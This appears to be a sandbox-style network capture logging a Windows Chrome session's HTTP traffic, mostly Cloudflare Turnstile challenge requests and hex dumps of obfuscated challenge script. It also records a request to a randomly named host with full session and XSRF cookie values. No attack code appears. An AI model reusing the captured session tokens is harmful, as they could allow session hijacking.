#branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:flex-start;justi
2024-10-30 15:05:35 UTC	1369	IN	Data Raw: 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 33 70 78 3b 73 74 72 6f 6b 65 2d 6c Data Ascii: text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width:3px;stroke-l

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:36 UTC	730	OUT	GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dac4dededb74654&lang=auto HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:37 UTC	331	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:36 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 113996 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Server: cloudflare CF-RAY: 8dac4df62946b792-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:37 UTC	1038	IN	Data Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 48 50 55 62 6a 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.HPUbj2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 69 6e 76 61 6c 69 64 5f 73 69 74 65 6b 65 79 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 73 69 74 65 6b 65 79 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 69 6e 76 61 6c 69 64 5f 64 6f 6d 61 69 6e 22 3a 22 49 6e 76 61 6c 69 64 25 32 30 64 6f 6d 61 69 6e 2e 25 32 30 43 6f 6e 74 61 63 74 25 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 Data Ascii: ick%20here%20for%20more%20information%3C%2Fa%3E","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_footer_terms":"Terms","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 4b 28 38 32 32 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 30 37 31 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 33 34 29 29 2f 38 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 36 33 38 29 29 2f 39 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 31 34 37 37 29 29 2f 31 30 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 35 36 30 37 30 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 31 36 33 36 29 5d 2c 65 4f 3d 5b 5d 2c 65 50 3d 30 3b 32 35 36 3e 65 50 3b 65 4f 5b 65 50 5d 3d 53 74 72 69 6e 67 5b 67 4c 28 35 33 32 29 5d 28 65 50 29 2c 65 50 2b 2b 29 Data Ascii: K(822))/6)+-parseInt(gK(1071))/7+-parseInt(gK(1434))/8+-parseInt(gK(638))/9*(-parseInt(gK(1477))/10),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,756070),eM=this\|\|self,eN=eM[gL(1636)],eO=[],eP=0;256>eP;eO[eP]=String[gL(532)](eP),eP++)
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 65 6f 66 20 45 72 72 6f 72 3f 66 5b 68 69 28 31 32 38 36 29 5d 3d 4a 53 4f 4e 5b 68 69 28 31 30 30 37 29 5d 28 66 5b 68 69 28 31 32 38 36 29 5d 2c 4f 62 6a 65 63 74 5b 68 69 28 37 36 39 29 5d 28 66 5b 68 69 28 31 32 38 36 29 5d 29 29 3a 66 5b 68 69 28 31 32 38 36 29 5d 3d 4a 53 4f 4e 5b 68 69 28 31 30 30 37 29 5d 28 66 5b 68 69 28 31 32 38 36 29 5d 29 2c 6b 3d 68 7c 7c 68 69 28 31 37 37 32 29 2c 6c 3d 65 4d 5b 68 69 28 38 37 34 29 5d 5b 68 69 28 35 36 39 29 5d 3f 69 5b 68 69 28 31 30 33 37 29 5d 28 27 68 2f 27 2b 65 4d 5b 68 69 28 38 37 34 29 5d 5b 68 69 28 35 36 39 29 5d 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 68 69 28 31 30 33 37 29 5d 28 69 5b 68 69 28 38 34 30 29 5d 28 69 5b 68 69 28 31 30 33 37 29 5d 28 68 69 28 31 38 30 32 29 2b 6c 2b 68 69 28 31 34 Data Ascii: eof Error?f[hi(1286)]=JSON[hi(1007)](f[hi(1286)],Object[hi(769)](f[hi(1286)])):f[hi(1286)]=JSON[hi(1007)](f[hi(1286)]),k=h\|\|hi(1772),l=eM[hi(874)][hi(569)]?i[hi(1037)]('h/'+eM[hi(874)][hi(569)],'/'):'',m=i[hi(1037)](i[hi(840)](i[hi(1037)](hi(1802)+l+hi(14
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 30 29 29 29 29 3a 28 6b 5b 68 6a 28 31 32 33 37 29 5d 5b 68 6a 28 31 33 33 39 29 5d 5b 68 6a 28 36 33 33 29 5d 28 6c 2c 6d 29 7c 7c 28 6e 5b 6f 5d 3d 5b 5d 29 2c 73 5b 76 5d 5b 68 6a 28 31 32 39 34 29 5d 28 78 29 29 29 3b 65 6c 73 65 20 69 66 28 65 5b 68 6a 28 39 38 30 29 5d 3d 3d 3d 65 5b 68 6a 28 39 38 30 29 5d 29 66 3d 4a 53 4f 4e 5b 68 6a 28 31 30 30 37 29 5d 28 64 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 76 6f 69 64 28 65 28 65 5b 68 6a 28 31 33 30 34 29 5d 29 2c 66 28 29 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 68 6a 28 36 36 36 29 5d 3d 66 2c 6d 5b 68 6a 28 31 31 35 35 29 5d 3d 67 2c 6d 5b 68 6a 28 31 34 39 30 29 5d 3d 68 2c 6d 5b 68 6a 28 31 33 32 30 29 5d 3d 69 2c 6d 5b 68 6a 28 31 32 38 36 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4c 28 31 37 Data Ascii: 0)))):(k[hj(1237)][hj(1339)][hj(633)](l,m)\|\|(n[o]=[]),s[v][hj(1294)](x)));else if(e[hj(980)]===e[hj(980)])f=JSON[hj(1007)](d);else return void(e(e[hj(1304)]),f());return m={},m[hj(666)]=f,m[hj(1155)]=g,m[hj(1490)]=h,m[hj(1320)]=i,m[hj(1286)]=d,m},eM[gL(17
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 29 7d 2c 31 65 33 29 3a 67 26 26 67 5b 69 37 28 34 37 32 29 5d 3d 3d 3d 66 5b 69 37 28 31 30 36 32 29 5d 26 26 67 5b 69 37 28 31 36 36 38 29 5d 3d 3d 3d 66 5b 69 37 28 37 34 34 29 5d 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 66 54 29 7d 29 2c 66 56 3d 21 5b 5d 2c 21 66 6d 28 67 4c 28 31 31 39 34 29 29 26 26 28 67 6d 28 29 2c 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 69 52 2c 63 2c 64 2c 65 29 7b 69 52 3d 67 4c 2c 63 3d 7b 27 42 54 71 45 71 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 6c 78 4c 54 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3e 67 7d 7d 2c 64 3d 65 4d 5b 69 52 28 38 37 34 29 5d 5b 69 52 28 31 32 35 33 29 5d 7c 7c 31 65 34 2c 65 3d 63 5b 69 52 28 39 Data Ascii: )},1e3):g&&g[i7(472)]===f[i7(1062)]&&g[i7(1668)]===f[i7(744)]&&clearInterval(fT)}),fV=![],!fm(gL(1194))&&(gm(),setInterval(function(iR,c,d,e){iR=gL,c={'BTqEq':function(f){return f()},'lxLTo':function(f,g){return f>g}},d=eM[iR(874)][iR(1253)]\|\|1e4,e=c[iR(9
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 36 3d 67 4c 2c 64 3d 7b 27 74 41 66 4a 43 27 3a 6a 36 28 31 32 32 31 29 2c 27 71 75 70 44 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 63 76 6d 77 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 68 42 59 6e 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 7a 4d 4c 55 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 5a 6b 4a 73 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 65 4f 57 4f 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 6a 73 58 48 58 27 3a Data Ascii: ,e,f,g){return j6=gL,d={'tAfJC':j6(1221),'qupDo':function(h,i){return h-i},'cvmwK':function(h,i){return h(i)},'hBYnw':function(h,i){return h<i},'zMLUR':function(h,i){return i\|h},'ZkJsh':function(h,i){return i==h},'eOWOp':function(h,i){return i\|h},'jsXHX':
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 6a 38 28 36 34 38 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 6a 38 28 31 30 36 38 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 38 28 31 32 39 34 29 5d 28 64 5b 6a 38 28 33 39 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 38 28 36 34 38 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 7c 4d 26 31 2e 30 32 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 38 28 31 32 39 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 6a 38 28 31 33 37 39 29 5d 28 73 2c 46 29 3b 48 3d 4d 7c 48 3c 3c 31 2e 35 32 2c 6a Data Ascii: (B,C)){if(256>C[j8(648)](0)){for(s=0;s<F;H<<=1,I==d[j8(1068)](j,1)?(I=0,G[j8(1294)](d[j8(397)](o,H)),H=0):I++,s++);for(M=C[j8(648)](0),s=0;8>s;H=H<<1\|M&1.02,j-1==I?(I=0,G[j8(1294)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[j8(1379)](s,F);H=M\|H<<1.52,j
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 3d 30 2c 47 5b 6a 38 28 31 32 39 34 29 5d 28 64 5b 6a 38 28 33 39 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 30 3d 3d 44 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 2e 39 36 7c 64 5b 6a 38 28 31 37 35 31 29 5d 28 4d 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 6a 38 28 31 32 39 34 29 5d 28 64 5b 6a 38 28 33 39 37 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 6a 38 28 31 30 36 38 29 5d 28 6a 2c 31 29 29 7b 47 5b 6a 38 28 31 32 39 34 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 6a 38 28 31 33 35 Data Ascii: =0,G[j8(1294)](d[j8(397)](o,H)),H=0):I++,M>>=1,s++);D--,0==D&&F++}for(M=2,s=0;s<F;H=H<<1.96\|d[j8(1751)](M,1),j-1==I?(I=0,G[j8(1294)](d[j8(397)](o,H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,I==d[j8(1068)](j,1)){G[j8(1294)](o(H));break}else I++;return G[j8(135
2024-10-30 15:05:37 UTC	1369	IN	Data Raw: 62 28 31 32 39 34 29 5d 28 4e 29 3b 3b 29 69 66 28 64 5b 6a 62 28 31 34 37 35 29 5d 21 3d 3d 6a 62 28 31 36 34 30 29 29 73 5b 6a 62 28 31 36 37 36 29 5d 28 4e 29 3b 65 6c 73 65 7b 69 66 28 64 5b 6a 62 28 31 33 30 32 29 5d 28 4a 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 6a 62 28 31 37 36 33 29 5d 28 32 2c 44 29 2c 47 3d 31 3b 64 5b 6a 62 28 39 36 33 29 5d 28 47 2c 4c 29 3b 4d 3d 48 26 49 2c 49 3e 3e 3d 31 2c 30 3d 3d 49 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 6a 62 28 31 35 35 31 29 5d 28 64 5b 6a 62 28 31 34 34 30 29 5d 28 30 2c 4d 29 3f 31 3a 30 2c 47 29 2c 47 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4e 3d 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 6a 62 28 Data Ascii: b(1294)](N);;)if(d[jb(1475)]!==jb(1640))s[jb(1676)](N);else{if(d[jb(1302)](J,i))return'';for(K=0,L=Math[jb(1763)](2,D),G=1;d[jb(963)](G,L);M=H&I,I>>=1,0==I&&(I=j,H=o(J++)),K\|=d[jb(1551)](d[jb(1440)](0,M)?1:0,G),G<<=1);switch(N=K){case 0:for(K=0,L=Math[jb(

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:36 UTC	742	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:37 UTC	240	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:37 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8dac4df6389e45f9-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:37 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:37 UTC	1323	OUT	GET /favicon.ico HTTP/1.1 Host: rpbr.ithbetoxi.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://rpbr.ithbetoxi.com/wtqllHS/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6ImJ3c2lMZFBpTGpKb3p0ZzNFN2E0WkE9PSIsInZhbHVlIjoiODZxK1d3cE9sY20vdk1kb3hLYklMY0RodURDYnNpWitleEJUa0tjeHVZeUJ6NjBtTldxcUpDMmtMcnhFRXVjRHNZcmthTzREc1FnWDJwbjVIMFBIelFnMFpZQ005cmpnZUNOaDZJSHBIMzVoRmhjZmttVURaZERYL3FDYWU3STIiLCJtYWMiOiIwMjJmYWRlY2NlMzY3NDBiOWE0YjI4NGI2NmIzYjI0YTA0NDdmODNkZjQ4NzhkZjQ1NGJjZjEyNzJjZjFiOWQxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjVYSHJMSWorRk02SDY1MDFJSDJ3Y0E9PSIsInZhbHVlIjoiZmFyZWlJc0lmcWNGc05ZMDM5NWxzRVpHRWw4U1ErVVRLQlRMQWNGTC9sSzduME96VVhhMFJwY1VENjdJdE8rajJHVEI1WU1WTHJvVThGUEgwYUxmcnZwYmpkOUtRRS9taFhzVk82aklqZWtEeDdWYXVQcGMwclYvQnB3c3FFZWEiLCJtYWMiOiJlYTM1YmJjYjNkNmFiYzBmMTg1MTMxYTc1NjA2YmY3OTQwNjlhZjZlN2IwOTMwNTUwZmJhNTczYTExZTM2NDIyIiwidGFnIjoiIn0%3D
2024-10-30 15:05:37 UTC	1020	IN	HTTP/1.1 404 Not Found Date: Wed, 30 Oct 2024 15:05:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tnKQcu8aFvvmKIn3VWKU%2F4Ykhbr%2FmnLHkB1XMQxqGDRL81by%2FetytXb8fQZQnfWDawuhROdpen8ayBUEZ%2BkR3mgBuoFOhk4QaXc5AyIkyIAu0ywx0a97b4x3JGEtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=306&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2165&delivery_rate=9621262&cwnd=251&unsent_bytes=0&cid=d9001e7a3908593e&ts=160&x=0" CF-Cache-Status: HIT Age: 12770 Server: cloudflare CF-RAY: 8dac4df9698145ee-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1100&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1901&delivery_rate=2535901&cwnd=237&unsent_bytes=0&cid=8958f64022ac99f8&ts=5784&x=0"
2024-10-30 15:05:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:37 UTC	385	OUT	GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:38 UTC	240	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:37 GMT Content-Type: image/png Content-Length: 61 Connection: close cache-control: max-age=2629800, public Server: cloudflare CF-RAY: 8dac4dfb28b3ddb1-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:38 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDRsIDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:38 UTC	1148	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 3114 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:38 UTC	3114	OUT	Data Raw: 76 5f 38 64 61 63 34 64 65 64 65 64 62 37 34 36 35 34 3d 67 4e 54 46 4a 46 64 46 6f 46 52 46 76 46 75 33 24 66 33 24 4a 77 6e 4a 6e 53 36 45 6e 36 24 6e 77 70 53 32 4e 2d 24 47 70 24 71 77 71 32 73 54 6e 30 71 70 74 69 64 24 32 50 35 46 24 4a 37 41 6a 24 73 4d 2d 6e 42 24 52 77 36 53 61 69 51 24 36 6a 24 56 2d 6e 47 64 71 24 77 6f 53 24 79 46 6e 53 65 4b 6c 78 6b 44 24 4b 24 6f 75 6a 52 24 6a 4a 6e 74 24 79 4e 71 37 6a 32 4c 5a 55 58 38 36 32 2d 6e 75 67 74 4d 6e 24 53 24 74 52 24 24 44 69 52 46 52 51 24 2d 70 24 6e 72 4e 6c 53 50 42 31 4d 58 32 4e 46 33 6b 51 71 4a 24 38 49 4d 24 47 51 69 73 44 24 6e 6a 4c 70 55 77 5a 38 24 24 77 38 4d 24 5a 78 4e 24 38 70 55 46 24 6a 35 50 24 67 47 47 31 2d 6e 6b 45 44 54 4e 79 24 24 64 24 71 74 46 4c 2d 6f 50 79 24 6f Data Ascii: v_8dac4dededb74654=gNTFJFdFoFRFvFu3$f3$JwnJnS6En6$nwpS2N-$Gp$qwq2sTn0qptid$2P5F$J7Aj$sM-nB$Rw6SaiQ$6j$V-nGdq$woS$yFnSeKlxkD$K$oujR$jJnt$yNq7j2LZUX862-nugtMn$S$tR$$DiRFRQ$-p$nrNlSPB1MX2NF3kQqJ$8IM$GQisD$njLpUwZ8$$w8M$ZxN$8pUF$j5P$gGG1-nkEDTNy$$d$qtFL-oPy$o
